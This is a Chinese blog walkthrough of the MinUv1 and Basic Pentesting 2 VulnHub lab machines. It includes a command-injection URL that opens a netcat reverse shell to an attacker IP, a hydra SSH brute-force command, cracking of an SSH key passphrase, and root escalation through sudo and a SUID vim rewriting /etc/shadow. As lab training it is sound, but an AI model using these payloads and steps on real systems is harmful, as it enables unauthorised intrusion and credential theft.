靶机渗透(MinUv1,basic pentesting2)

pentest

MinUv1

介绍

https://www.vulnhub.com/entry/minu-1,235/

ip和端口

靶机ip:192.168.1.102 端口情况

代码执行

去80看下,发现apache的默认配置页面 dirb扫一下,没什么有用的东西,换了个扫目录工具 dirsearch找到一个test.php 然后查看最新页面发现一个类似文件包含的页面 然后发现并不是文件包含,而是任意代码执行.. 他包含源码的方式应该是system('cat xxx')这种 不过似乎有很多命令会失败,这里有人提供了一个网站,里面蛮多命令的利用的,分享一下:https://gtfobins.github.io/ 然后这里用到busybox

1
http://192.168.1.102/test.php?file=index;busybox%20nc%20192.168.1.105%206712%20-e%20sh%20-i

拿到shell

提权

看下/etc/passwd,发现了bob用户,到bob的目录看下 看下

1
2
/home/bob $ cat ._pw_
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

发现是jwt,用工具解一下 跑了一年跑出来了... 然而电脑里似乎并没有python,不能调用su... 这里就有一个新方法,可以调用script来换用户

basic pentesting2

蛮有意思的,方法蛮多的

介绍

https://www.vulnhub.com/entry/basic-pentesting-2,241/

ip和端口

靶机ip:192.168.1.106 端口情况

getshell

去80端口发现源码里面的注释

1
2
3
4
5
6
7
8
9
10
<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

扫一下目录 去/development看下 然后拿到两份信息 dev.txt

1
2
3
4
5
6
7
8
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

1
2
3
4
5
6
7
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

然后这里学到一种新的探测方法enum4linux 然后枚举出username 又开了22端口,hydra试一下

1
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 4 -f 192.168.1.106 ssh

提权

官方解

首先登录进去,发现还有一个kay用户 然后我们去kay用户目录看下 发现.ssh,去看一下,发现authorized_keys后面有一句话 尝试私钥登录,但是失败了,要求输入passphrase 所以尝试解pass 复制一份私钥为id_rsa,然后ssh2john用john来破解,然后我这里破解过一次,就直接--show了 登录成功 然后kay目录发现备份密码

1
2
kay@basic2:~$ cat pass.bak 
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

尝试一下sudo -l

1
2
3
4
5
6
kay@basic2:~$ sudo -l
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL

那么就直接sudo bash就好

不知道是不是官方解

suid提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
jan@basic2:/home/kay/.ssh$ find / -perm -4000 -user root 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd
/bin/su
/bin/ntfs-3g
/bin/ping6
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping

看到了vim.basic,替换shadow密码就好 然后直接su root就好

弯路

看了8080的manager页面msf爆了一波密码,并没有结果 看到80端口写的struts2.5.12和REST,然后searchsploit找到了漏洞,但是并没有攻击成功... 思路还是开阔点吧...

后续

看了下tomcat的目录,还真的有struts2-rest的目录...不过当时没找到...msf一波带走了... 然后manager模块的密码 猜不出来很正常...